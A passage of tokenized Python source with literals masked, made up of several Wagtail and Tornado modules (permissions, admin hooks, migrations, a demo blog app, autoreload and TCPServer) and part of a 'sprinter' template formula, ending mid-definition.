owner = getattr ( instance , self . owner_field_name ) <EOL> if owner is not None and owner . has_perm ( self . _get_permission_name ( '<STR_LIT>' ) ) : <EOL> filter_expr = filter_expr | Q ( pk = owner . pk ) <EOL> return get_user_model ( ) . objects . filter ( filter_expr ) . distinct ( ) <EOL> else : <EOL> return get_user_model ( ) . objects . filter ( is_active = True , is_superuser = True ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import re <EOL> import unicodedata <EOL> from django . apps import apps <EOL> from django . conf import settings <EOL> from django . db . models import Model <EOL> from django . utils . encoding import force_text <EOL> from django . utils . six import string_types <EOL> from django . utils . text import slugify <EOL> WAGTAIL_APPEND_SLASH = getattr ( settings , '<STR_LIT>' , True ) <EOL> def camelcase_to_underscore ( str ) : <EOL> return re . sub ( '<STR_LIT>' , '<STR_LIT>' , str ) . lower ( ) . strip ( '<STR_LIT:_>' ) <EOL> def resolve_model_string ( model_string , default_app = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( model_string , string_types ) : <EOL> try : <EOL> app_label , model_name = model_string . split ( "<STR_LIT:.>" ) <EOL> except ValueError : <EOL> if default_app is not None : <EOL> app_label = default_app <EOL> model_name = model_string <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" . format ( <EOL> model_string ) , model_string ) <EOL> return apps . get_model ( app_label , model_name ) <EOL> elif isinstance ( model_string , type ) and issubclass ( model_string , Model ) : <EOL> return model_string <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" . format ( model_string ) , model_string ) <EOL> SCRIPT_RE = re . compile ( r'<STR_LIT>' ) <EOL> def escape_script ( text ) : <EOL> """<STR_LIT>""" <EOL> return SCRIPT_RE . sub ( r'<STR_LIT>' , text ) <EOL> SLUGIFY_RE = re . compile ( r'<STR_LIT>' , re . UNICODE ) <EOL> def cautious_slugify ( value ) : <EOL> """<STR_LIT>""" <EOL> value = force_text ( value ) <EOL> value = unicodedata . normalize ( '<STR_LIT>' , value ) <EOL> value = SLUGIFY_RE . sub ( '<STR_LIT>' , value ) <EOL> value = value . encode ( '<STR_LIT:ascii>' , '<STR_LIT>' ) . decode ( '<STR_LIT:ascii>' ) <EOL> return slugify ( value ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django . conf . urls import include , url <EOL> from django . contrib . staticfiles . templatetags . staticfiles import static <EOL> from django . core import urlresolvers <EOL> from django . utils . html import format_html , format_html_join <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . utils . translation import ungettext <EOL> from wagtail . wagtailadmin . menu import MenuItem <EOL> from wagtail . wagtailadmin . search import SearchArea <EOL> from wagtail . wagtailadmin . site_summary import SummaryItem <EOL> from wagtail . wagtailcore import hooks <EOL> from wagtail . wagtaildocs import admin_urls <EOL> from wagtail . wagtaildocs . forms import GroupDocumentPermissionFormSet <EOL> from wagtail . wagtaildocs . models import get_document_model <EOL> from wagtail . wagtaildocs . permissions import permission_policy <EOL> from wagtail . wagtaildocs . rich_text import DocumentLinkHandler <EOL> @ hooks . register ( '<STR_LIT>' ) <EOL> def register_admin_urls ( ) : <EOL> return [ <EOL> url ( r'<STR_LIT>' , include ( admin_urls , app_name = '<STR_LIT>' , namespace = '<STR_LIT>' ) ) , <EOL> ] <EOL> class DocumentsMenuItem ( MenuItem ) : <EOL> def is_shown ( self , request ) : <EOL> return permission_policy . user_has_any_permission ( <EOL> request . user , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> @ hooks . register ( '<STR_LIT>' ) <EOL> def register_documents_menu_item ( ) : <EOL> return DocumentsMenuItem ( <EOL> _ ( '<STR_LIT>' ) , <EOL> urlresolvers . reverse ( '<STR_LIT>' ) , <EOL> name = '<STR_LIT>' , <EOL> classnames = '<STR_LIT>' , <EOL> order = <NUM_LIT> <EOL> ) <EOL> @ hooks . register ( '<STR_LIT>' ) <EOL> def editor_js ( ) : <EOL> js_files = [ <EOL> static ( '<STR_LIT>' ) , <EOL> static ( '<STR_LIT>' ) , <EOL> ] <EOL> js_includes = format_html_join ( <EOL> '<STR_LIT:\n>' , '<STR_LIT>' , <EOL> ( ( filename , ) for filename in js_files ) <EOL> ) <EOL> return js_includes + format_html ( <EOL> """<STR_LIT>""" , <EOL> urlresolvers . reverse ( '<STR_LIT>' ) <EOL> ) <EOL> @ hooks . register ( '<STR_LIT>' ) <EOL> def register_document_link_handler ( ) : <EOL> return ( '<STR_LIT>' , DocumentLinkHandler ) <EOL> class DocumentsSummaryItem ( SummaryItem ) : <EOL> order = <NUM_LIT> <EOL> template = '<STR_LIT>' <EOL> def get_context ( self ) : <EOL> return { <EOL> '<STR_LIT>' : get_document_model ( ) . objects . count ( ) , <EOL> } <EOL> @ hooks . register ( '<STR_LIT>' ) <EOL> def add_documents_summary_item ( request , items ) : <EOL> items . append ( DocumentsSummaryItem ( request ) ) <EOL> class DocsSearchArea ( SearchArea ) : <EOL> def is_shown ( self , request ) : <EOL> return permission_policy . user_has_any_permission ( <EOL> request . user , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> @ hooks . register ( '<STR_LIT>' ) <EOL> def register_documents_search_area ( ) : <EOL> return DocsSearchArea ( <EOL> _ ( '<STR_LIT>' ) , urlresolvers . reverse ( '<STR_LIT>' ) , <EOL> name = '<STR_LIT>' , <EOL> classnames = '<STR_LIT>' , <EOL> order = <NUM_LIT> ) <EOL> @ hooks . register ( '<STR_LIT>' ) <EOL> def register_document_permissions_panel ( ) : <EOL> return GroupDocumentPermissionFormSet <EOL> @ hooks . register ( '<STR_LIT>' ) <EOL> def describe_collection_docs ( collection ) : <EOL> docs_count = get_document_model ( ) . objects . filter ( collection = collection ) . count ( ) <EOL> if docs_count : <EOL> url = urlresolvers . reverse ( '<STR_LIT>' ) + ( '<STR_LIT>' % collection . id ) <EOL> return { <EOL> '<STR_LIT:count>' : docs_count , <EOL> '<STR_LIT>' : ungettext ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> docs_count <EOL> ) % { '<STR_LIT:count>' : docs_count } , <EOL> '<STR_LIT:url>' : url , <EOL> } </s>
<s> from __future__ import unicode_literals <EOL> from django . db import migrations , models <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterModelOptions ( <EOL> name = '<STR_LIT>' , <EOL> options = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . DateTimeField ( auto_now_add = True , verbose_name = '<STR_LIT>' ) , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> import django . db . models . deletion <EOL> from django . conf import settings <EOL> from django . db import migrations , models <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT:image>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( <EOL> on_delete = django . db . models . deletion . SET_NULL , blank = True , editable = False , <EOL> to = settings . AUTH_USER_MODEL , null = True , verbose_name = '<STR_LIT>' <EOL> ) , <EOL> ) , <EOL> ] </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django . apps import AppConfig <EOL> class WagtailRedirectsAppConfig ( AppConfig ) : <EOL> name = '<STR_LIT>' <EOL> label = '<STR_LIT>' <EOL> verbose_name = "<STR_LIT>" </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from wagtail . wagtailsearch . backends import get_search_backend <EOL> class SearchableQuerySetMixin ( object ) : <EOL> def search ( self , query_string , fields = None , <EOL> operator = None , order_by_relevance = True , backend = '<STR_LIT:default>' ) : <EOL> """<STR_LIT>""" <EOL> search_backend = get_search_backend ( backend ) <EOL> return search_backend . search ( query_string , self , fields = fields , <EOL> operator = operator , order_by_relevance = order_by_relevance ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django . contrib . auth import get_permission_codename <EOL> from wagtail . wagtailsnippets . models import get_snippet_models <EOL> def get_permission_name ( action , model ) : <EOL> return "<STR_LIT>" % ( model . _meta . app_label , get_permission_codename ( action , model . _meta ) ) <EOL> def user_can_edit_snippet_type ( user , model ) : <EOL> """<STR_LIT>""" <EOL> for action in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if user . has_perm ( get_permission_name ( action , model ) ) : <EOL> return True <EOL> return False <EOL> def user_can_edit_snippets ( user ) : <EOL> """<STR_LIT>""" <EOL> snippet_models = get_snippet_models ( ) <EOL> for model in snippet_models : <EOL> if user_can_edit_snippet_type ( user , model ) : <EOL> return True <EOL> return False </s>
<s> import bcrypt <EOL> import concurrent . futures <EOL> import MySQLdb <EOL> import markdown <EOL> import os . path <EOL> import re <EOL> import subprocess <EOL> import torndb <EOL> import tornado . escape <EOL> from tornado import gen <EOL> import tornado . httpserver <EOL> import tornado . ioloop <EOL> import tornado . options <EOL> import tornado . web <EOL> import unicodedata <EOL> from tornado . options import define , options <EOL> define ( "<STR_LIT:port>" , default = <NUM_LIT> , help = "<STR_LIT>" , type = int ) <EOL> define ( "<STR_LIT>" , default = "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> define ( "<STR_LIT>" , default = "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> define ( "<STR_LIT>" , default = "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> define ( "<STR_LIT>" , default = "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> executor = concurrent . futures . ThreadPoolExecutor ( <NUM_LIT:2> ) <EOL> class Application ( tornado . web . Application ) : <EOL> def __init__ ( self ) : <EOL> handlers = [ <EOL> ( r"<STR_LIT:/>" , HomeHandler ) , <EOL> ( r"<STR_LIT>" , ArchiveHandler ) , <EOL> ( r"<STR_LIT>" , FeedHandler ) , <EOL> ( r"<STR_LIT>" , EntryHandler ) , <EOL> ( r"<STR_LIT>" , ComposeHandler ) , <EOL> ( r"<STR_LIT>" , AuthCreateHandler ) , <EOL> ( r"<STR_LIT>" , AuthLoginHandler ) , <EOL> ( r"<STR_LIT>" , AuthLogoutHandler ) , <EOL> ] <EOL> settings = dict ( <EOL> blog_title = u"<STR_LIT>" , <EOL> template_path = os . path . join ( os . path . dirname ( __file__ ) , "<STR_LIT>" ) , <EOL> static_path = os . path . join ( os . path . dirname ( __file__ ) , "<STR_LIT>" ) , <EOL> ui_modules = { "<STR_LIT>" : EntryModule } , <EOL> xsrf_cookies = True , <EOL> cookie_secret = "<STR_LIT>" , <EOL> login_url = "<STR_LIT>" , <EOL> debug = True , <EOL> ) <EOL> super ( Application , self ) . __init__ ( handlers , ** settings ) <EOL> self . db = torndb . Connection ( <EOL> host = options . mysql_host , database = options . mysql_database , <EOL> user = options . mysql_user , password = options . mysql_password ) <EOL> self . maybe_create_tables ( ) <EOL> def maybe_create_tables ( self ) : <EOL> try : <EOL> self . db . get ( "<STR_LIT>" ) <EOL> except MySQLdb . ProgrammingError : <EOL> subprocess . check_call ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' + options . mysql_host , <EOL> '<STR_LIT>' + options . mysql_database , <EOL> '<STR_LIT>' + options . mysql_user , <EOL> '<STR_LIT>' + options . mysql_password ] , <EOL> stdin = open ( '<STR_LIT>' ) ) <EOL> class BaseHandler ( tornado . web . RequestHandler ) : <EOL> @ property <EOL> def db ( self ) : <EOL> return self . application . db <EOL> def get_current_user ( self ) : <EOL> user_id = self . get_secure_cookie ( "<STR_LIT>" ) <EOL> if not user_id : return None <EOL> return self . db . get ( "<STR_LIT>" , int ( user_id ) ) <EOL> def any_author_exists ( self ) : <EOL> return bool ( self . db . get ( "<STR_LIT>" ) ) <EOL> class HomeHandler ( BaseHandler ) : <EOL> def get ( self ) : <EOL> entries = self . db . query ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if not entries : <EOL> self . redirect ( "<STR_LIT>" ) <EOL> return <EOL> self . render ( "<STR_LIT>" , entries = entries ) <EOL> class EntryHandler ( BaseHandler ) : <EOL> def get ( self , slug ) : <EOL> entry = self . db . get ( "<STR_LIT>" , slug ) <EOL> if not entry : raise tornado . web . HTTPError ( <NUM_LIT> ) <EOL> self . render ( "<STR_LIT>" , entry = entry ) <EOL> class ArchiveHandler ( BaseHandler ) : <EOL> def get ( self ) : <EOL> entries = self . db . query ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . render ( "<STR_LIT>" , entries = entries ) <EOL> class FeedHandler ( BaseHandler ) : <EOL> def get ( self ) : <EOL> entries = self . db . query ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . set_header ( "<STR_LIT:Content-Type>" , "<STR_LIT>" ) <EOL> self . render ( "<STR_LIT>" , entries = entries ) <EOL> class ComposeHandler ( BaseHandler ) : <EOL> @ tornado . web . authenticated <EOL> def get ( self ) : <EOL> id = self . get_argument ( "<STR_LIT:id>" , None ) <EOL> entry = None <EOL> if id : <EOL> entry = self . db . get ( "<STR_LIT>" , int ( id ) ) <EOL> self . render ( "<STR_LIT>" , entry = entry ) <EOL> @ tornado . web . authenticated <EOL> def post ( self ) : <EOL> id = self . get_argument ( "<STR_LIT:id>" , None ) <EOL> title = self . get_argument ( "<STR_LIT:title>" ) <EOL> text = self . get_argument ( "<STR_LIT>" ) <EOL> html = markdown . markdown ( text ) <EOL> if id : <EOL> entry = self . db . get ( "<STR_LIT>" , int ( id ) ) <EOL> if not entry : raise tornado . web . HTTPError ( <NUM_LIT> ) <EOL> slug = entry . slug <EOL> self . db . execute ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , title , text , html , int ( id ) ) <EOL> else : <EOL> slug = unicodedata . normalize ( "<STR_LIT>" , title ) . encode ( <EOL> "<STR_LIT:ascii>" , "<STR_LIT:ignore>" ) <EOL> slug = re . sub ( r"<STR_LIT>" , "<STR_LIT:U+0020>" , slug ) <EOL> slug = "<STR_LIT:->" . join ( slug . lower ( ) . strip ( ) . split ( ) ) <EOL> if not slug : slug = "<STR_LIT>" <EOL> while True : <EOL> e = self . db . get ( "<STR_LIT>" , slug ) <EOL> if not e : break <EOL> slug += "<STR_LIT>" <EOL> self . db . execute ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> self . current_user . id , title , slug , text , html ) <EOL> self . redirect ( "<STR_LIT>" + slug ) <EOL> class AuthCreateHandler ( BaseHandler ) : <EOL> def get ( self ) : <EOL> self . render ( "<STR_LIT>" ) <EOL> @ gen . coroutine <EOL> def post ( self ) : <EOL> if self . any_author_exists ( ) : <EOL> raise tornado . web . HTTPError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> hashed_password = yield executor . submit ( <EOL> bcrypt . hashpw , tornado . escape . utf8 ( self . get_argument ( "<STR_LIT:password>" ) ) , <EOL> bcrypt . gensalt ( ) ) <EOL> author_id = self . db . execute ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> self . get_argument ( "<STR_LIT:email>" ) , self . get_argument ( "<STR_LIT:name>" ) , <EOL> hashed_password ) <EOL> self . set_secure_cookie ( "<STR_LIT>" , str ( author_id ) ) <EOL> self . redirect ( self . get_argument ( "<STR_LIT>" , "<STR_LIT:/>" ) ) <EOL> class AuthLoginHandler ( BaseHandler ) : <EOL> def get ( self ) : <EOL> if not self . any_author_exists ( ) : <EOL> self . redirect ( "<STR_LIT>" ) <EOL> else : <EOL> self . render ( "<STR_LIT>" , error = None ) <EOL> @ gen . coroutine <EOL> def post ( self ) : <EOL> author = self . db . get ( "<STR_LIT>" , <EOL> self . get_argument ( "<STR_LIT:email>" ) ) <EOL> if not author : <EOL> self . render ( "<STR_LIT>" , error = "<STR_LIT>" ) <EOL> return <EOL> hashed_password = yield executor . submit ( <EOL> bcrypt . hashpw , tornado . escape . utf8 ( self . get_argument ( "<STR_LIT:password>" ) ) , <EOL> tornado . escape . utf8 ( author . hashed_password ) ) <EOL> if hashed_password == author . hashed_password : <EOL> self . set_secure_cookie ( "<STR_LIT>" , str ( author . id ) ) <EOL> self . redirect ( self . get_argument ( "<STR_LIT>" , "<STR_LIT:/>" ) ) <EOL> else : <EOL> self . render ( "<STR_LIT>" , error = "<STR_LIT>" ) <EOL> class AuthLogoutHandler ( BaseHandler ) : <EOL> def get ( self ) : <EOL> self . clear_cookie ( "<STR_LIT>" ) <EOL> self . redirect ( self . get_argument ( "<STR_LIT>" , "<STR_LIT:/>" ) ) <EOL> class EntryModule ( tornado . web . UIModule ) : <EOL> def render ( self , entry ) : <EOL> return self . render_string ( "<STR_LIT>" , entry = entry ) <EOL> def main ( ) : <EOL> tornado . options . parse_command_line ( ) <EOL> http_server = tornado . httpserver . HTTPServer ( Application ( ) ) <EOL> http_server . listen ( options . port ) <EOL> tornado . ioloop . IOLoop . current ( ) . start ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , division , print_function , with_statement <EOL> import os <EOL> import sys <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> if sys . path [ <NUM_LIT:0> ] == os . path . dirname ( __file__ ) : <EOL> del sys . path [ <NUM_LIT:0> ] <EOL> import functools <EOL> import logging <EOL> import os <EOL> import pkgutil <EOL> import sys <EOL> import traceback <EOL> import types <EOL> import subprocess <EOL> import weakref <EOL> from tornado import ioloop <EOL> from tornado . log import gen_log <EOL> from tornado import process <EOL> from tornado . util import exec_in <EOL> try : <EOL> import signal <EOL> except ImportError : <EOL> signal = None <EOL> _has_execv = sys . platform != '<STR_LIT:win32>' <EOL> _watched_files = set ( ) <EOL> _reload_hooks = [ ] <EOL> _reload_attempted = False <EOL> _io_loops = weakref . WeakKeyDictionary ( ) <EOL> def start ( io_loop = None , check_time = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> io_loop = io_loop or ioloop . IOLoop . current ( ) <EOL> if io_loop in _io_loops : <EOL> return <EOL> _io_loops [ io_loop ] = True <EOL> if len ( _io_loops ) > <NUM_LIT:1> : <EOL> gen_log . warning ( "<STR_LIT>" ) <EOL> if _has_execv : <EOL> add_reload_hook ( functools . partial ( io_loop . close , all_fds = True ) ) <EOL> modify_times = { } <EOL> callback = functools . partial ( _reload_on_update , modify_times ) <EOL> scheduler = ioloop . PeriodicCallback ( callback , check_time , io_loop = io_loop ) <EOL> scheduler . start ( ) <EOL> def wait ( ) : <EOL> """<STR_LIT>""" <EOL> io_loop = ioloop . IOLoop ( ) <EOL> start ( io_loop ) <EOL> io_loop . start ( ) <EOL> def watch ( filename ) : <EOL> """<STR_LIT>""" <EOL> _watched_files . add ( filename ) <EOL> def add_reload_hook ( fn ) : <EOL> """<STR_LIT>""" <EOL> _reload_hooks . append ( fn ) <EOL> def _reload_on_update ( modify_times ) : <EOL> if _reload_attempted : <EOL> return <EOL> if process . task_id ( ) is not None : <EOL> return <EOL> for module in list ( sys . modules . values ( ) ) : <EOL> if not isinstance ( module , types . ModuleType ) : <EOL> continue <EOL> path = getattr ( module , "<STR_LIT>" , None ) <EOL> if not path : <EOL> continue <EOL> if path . endswith ( "<STR_LIT>" ) or path . endswith ( "<STR_LIT>" ) : <EOL> path = path [ : - <NUM_LIT:1> ] <EOL> _check_file ( modify_times , path ) <EOL> for path in _watched_files : <EOL> _check_file ( modify_times , path ) <EOL> def _check_file ( modify_times , path ) : <EOL> try : <EOL> modified = os . stat ( path ) . st_mtime <EOL> except Exception : <EOL> return <EOL> if path not in modify_times : <EOL> modify_times [ path ] = modified <EOL> return <EOL> if modify_times [ path ] != modified : <EOL> gen_log . info ( "<STR_LIT>" , path ) <EOL> _reload ( ) <EOL> def _reload ( ) : <EOL> global _reload_attempted <EOL> _reload_attempted = True <EOL> for fn in _reload_hooks : <EOL> fn ( ) <EOL> if hasattr ( signal , "<STR_LIT>" ) : <EOL> signal . setitimer ( signal . ITIMER_REAL , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> path_prefix = '<STR_LIT:.>' + os . pathsep <EOL> if ( sys . path [ <NUM_LIT:0> ] == '<STR_LIT>' and <EOL> not os . environ . get ( "<STR_LIT>" , "<STR_LIT>" ) . startswith ( path_prefix ) ) : <EOL> os . environ [ "<STR_LIT>" ] = ( path_prefix + <EOL> os . environ . get ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> if not _has_execv : <EOL> subprocess . Popen ( [ sys . executable ] + sys . argv ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> else : <EOL> try : <EOL> os . execv ( sys . executable , [ sys . executable ] + sys . argv ) <EOL> except OSError : <EOL> os . spawnv ( os . P_NOWAIT , sys . executable , <EOL> [ sys . executable ] + sys . argv ) <EOL> os . _exit ( <NUM_LIT:0> ) <EOL> _USAGE = """<STR_LIT>""" <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> original_argv = sys . argv <EOL> sys . argv = sys . argv [ : ] <EOL> if len ( sys . argv ) >= <NUM_LIT:3> and sys . argv [ <NUM_LIT:1> ] == "<STR_LIT>" : <EOL> mode = "<STR_LIT>" <EOL> module = sys . argv [ <NUM_LIT:2> ] <EOL> del sys . argv [ <NUM_LIT:1> : <NUM_LIT:3> ] <EOL> elif len ( sys . argv ) >= <NUM_LIT:2> : <EOL> mode = "<STR_LIT>" <EOL> script = sys . argv [ <NUM_LIT:1> ] <EOL> sys . argv = sys . argv [ <NUM_LIT:1> : ] <EOL> else : <EOL> print ( _USAGE , file = sys . stderr ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> try : <EOL> if mode == "<STR_LIT>" : <EOL> import runpy <EOL> runpy . run_module ( module , run_name = "<STR_LIT:__main__>" , alter_sys = True ) <EOL> elif mode == "<STR_LIT>" : <EOL> with open ( script ) as f : <EOL> global __file__ <EOL> __file__ = script <EOL> global __package__ <EOL> del __package__ <EOL> exec_in ( f . read ( ) , globals ( ) , globals ( ) ) <EOL> except SystemExit as e : <EOL> logging . basicConfig ( ) <EOL> gen_log . info ( "<STR_LIT>" , e . code ) <EOL> except Exception as e : <EOL> logging . basicConfig ( ) <EOL> gen_log . warning ( "<STR_LIT>" , exc_info = True ) <EOL> for ( filename , lineno , name , line ) in traceback . extract_tb ( sys . exc_info ( ) [ <NUM_LIT:2> ] ) : <EOL> watch ( filename ) <EOL> if isinstance ( e , SyntaxError ) : <EOL> watch ( e . filename ) <EOL> else : <EOL> logging . basicConfig ( ) <EOL> gen_log . info ( "<STR_LIT>" ) <EOL> sys . argv = original_argv <EOL> if mode == '<STR_LIT>' : <EOL> loader = pkgutil . get_loader ( module ) <EOL> if loader is not None : <EOL> watch ( loader . get_filename ( ) ) <EOL> wait ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , division , print_function , with_statement <EOL> import errno <EOL> import os <EOL> import socket <EOL> from tornado . log import app_log <EOL> from tornado . ioloop import IOLoop <EOL> from tornado . iostream import IOStream , SSLIOStream <EOL> from tornado . netutil import bind_sockets , add_accept_handler , ssl_wrap_socket <EOL> from tornado import process <EOL> from tornado . util import errno_from_exception <EOL> try : <EOL> import ssl <EOL> except ImportError : <EOL> ssl = None <EOL> class TCPServer ( object ) : <EOL> r"""<STR_LIT>""" <EOL> def __init__ ( self , io_loop = None , ssl_options = None , max_buffer_size = None , <EOL> read_chunk_size = None ) : <EOL> self . io_loop = io_loop <EOL> self . ssl_options = ssl_options <EOL> self . _sockets = { } <EOL> self . _pending_sockets = [ ] <EOL> self . _started = False <EOL> self . max_buffer_size = max_buffer_size <EOL> self . read_chunk_size = read_chunk_size <EOL> if self . ssl_options is not None and isinstance ( self . ssl_options , dict ) : <EOL> if '<STR_LIT>' not in self . ssl_options : <EOL> raise KeyError ( '<STR_LIT>' ) <EOL> if not os . path . exists ( self . ssl_options [ '<STR_LIT>' ] ) : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> self . ssl_options [ '<STR_LIT>' ] ) <EOL> if ( '<STR_LIT>' in self . ssl_options and <EOL> not os . path . exists ( self . ssl_options [ '<STR_LIT>' ] ) ) : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> self . ssl_options [ '<STR_LIT>' ] ) <EOL> def listen ( self , port , address = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> sockets = bind_sockets ( port , address = address ) <EOL> self . add_sockets ( sockets ) <EOL> def add_sockets ( self , sockets ) : <EOL> """<STR_LIT>""" <EOL> if self . io_loop is None : <EOL> self . io_loop = IOLoop . current ( ) <EOL> for sock in sockets : <EOL> self . _sockets [ sock . fileno ( ) ] = sock <EOL> add_accept_handler ( sock , self . _handle_connection , <EOL> io_loop = self . io_loop ) <EOL> def add_socket ( self , socket ) : <EOL> """<STR_LIT>""" <EOL> self . add_sockets ( [ socket ] ) <EOL> def bind ( self , port , address = None , family = socket . AF_UNSPEC , backlog = <NUM_LIT> , reuse_port = False ) : <EOL> """<STR_LIT>""" <EOL> sockets = bind_sockets ( port , address = address , family = family , <EOL> backlog = backlog , reuse_port = reuse_port ) <EOL> if self . _started : <EOL> self . add_sockets ( sockets ) <EOL> else : <EOL> self . _pending_sockets . extend ( sockets ) <EOL> def start ( self , num_processes = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> assert not self . _started <EOL> self . _started = True <EOL> if num_processes != <NUM_LIT:1> : <EOL> process . fork_processes ( num_processes ) <EOL> sockets = self . _pending_sockets <EOL> self . _pending_sockets = [ ] <EOL> self . add_sockets ( sockets ) <EOL> def stop ( self ) : <EOL> """<STR_LIT>""" <EOL> for fd , sock in self . _sockets . items ( ) : <EOL> self . io_loop . remove_handler ( fd ) <EOL> sock . close ( ) <EOL> def handle_stream ( self , stream , address ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def _handle_connection ( self , connection , address ) : <EOL> if self . ssl_options is not None : <EOL> assert ssl , "<STR_LIT>" <EOL> try : <EOL> connection = ssl_wrap_socket ( connection , <EOL> self . ssl_options , <EOL> server_side = True , <EOL> do_handshake_on_connect = False ) <EOL> except ssl . SSLError as err : <EOL> if err . args [ <NUM_LIT:0> ] == ssl . SSL_ERROR_EOF : <EOL> return connection . close ( ) <EOL> else : <EOL> raise <EOL> except socket . error as err : <EOL> if errno_from_exception ( err ) in ( errno . ECONNABORTED , errno . EINVAL ) : <EOL> return connection . close ( ) <EOL> else : <EOL> raise <EOL> try : <EOL> if self . ssl_options is not None : <EOL> stream = SSLIOStream ( connection , io_loop = self . io_loop , <EOL> max_buffer_size = self . max_buffer_size , <EOL> read_chunk_size = self . read_chunk_size ) <EOL> else : <EOL> stream = IOStream ( connection , io_loop = self . io_loop , <EOL> max_buffer_size = self . max_buffer_size , <EOL> read_chunk_size = self . read_chunk_size ) <EOL> future = self . handle_stream ( stream , address ) <EOL> if future is not None : <EOL> self . io_loop . add_future ( future , lambda f : f . result ( ) ) <EOL> except Exception : <EOL> app_log . error ( "<STR_LIT>" , exc_info = True ) </s>
<s> from copy import copy <EOL> from six . moves import filter <EOL> _BOOLEAN_ATTRS = frozenset ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def htmlbools ( v ) : <EOL> attrs = copy ( v ) <EOL> for key in filter ( lambda k : k in _BOOLEAN_ATTRS , attrs . keys ( ) ) : <EOL> if attrs [ key ] : <EOL> attrs [ key ] = key <EOL> else : <EOL> attrs [ key ] = None <EOL> return attrs </s>
<s> from . core import PHASE <EOL> from . directory import Directory <EOL> from . globals import load_global_config <EOL> from . . next . environment . injections import Injections <EOL> from . manifest import Manifest , ManifestException , load_manifest <EOL> from . featuredict import FeatureDict </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import os <EOL> import string <EOL> from collections import defaultdict <EOL> from sprinter . formula . base import FormulaBase <EOL> import sprinter . lib as lib <EOL> from sprinter . core import PHASE <EOL> class TemplateFormula ( FormulaBase ) : <EOL> required_options = FormulaBase . required_options + [ '<STR_LIT:source>' , '<STR_LIT:target>' ] <EOL> valid_options = [ '<STR_LIT>' ] <EOL> def prompt ( self ) : <EOL> if self . environment . phase == PHASE . REMOVE : <EOL> self . source . prompt ( '<STR_LIT>' , <EOL> "<STR_LIT>" % self . source . get ( '<STR_LIT:target>' ) , <EOL> default = "<STR_LIT:yes>" ) <EOL> def install ( self ) : <EOL> self . __install_file ( self . target ) <EOL> FormulaBase . install ( self ) <EOL> def update ( self ) : <EOL> acted = False <EOL> if self . target . has ( '<STR_LIT>' ) and self . target . is_affirmative ( '<STR_LIT>' ) : <EOL> self . __install_file ( self . target ) <EOL> acted = True <EOL> FormulaBase . update ( self ) <EOL> return acted <EOL> def remove ( self ) : <EOL> if self . source . is_affirmative ( '<STR_LIT>' , False ) : <EOL> os . path . unlink ( <EOL> os . path . expanduser ( self . source . get ( '<STR_LIT:target>' ) ) ) <EOL> FormulaBase . remove ( self ) <EOL> def validate ( self ) : <EOL> if self . target : <EOL> if ( self . target . has ( '<STR_LIT:username>' ) and not self . target . has ( '<STR_LIT:password>' ) or <EOL> self . target . has ( '<STR_LIT:password>' ) and not self . target . has ( '<STR_LIT:username>' ) ) : <EOL> self . logger . warn ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> FormulaBase . validate ( self ) <EOL> def 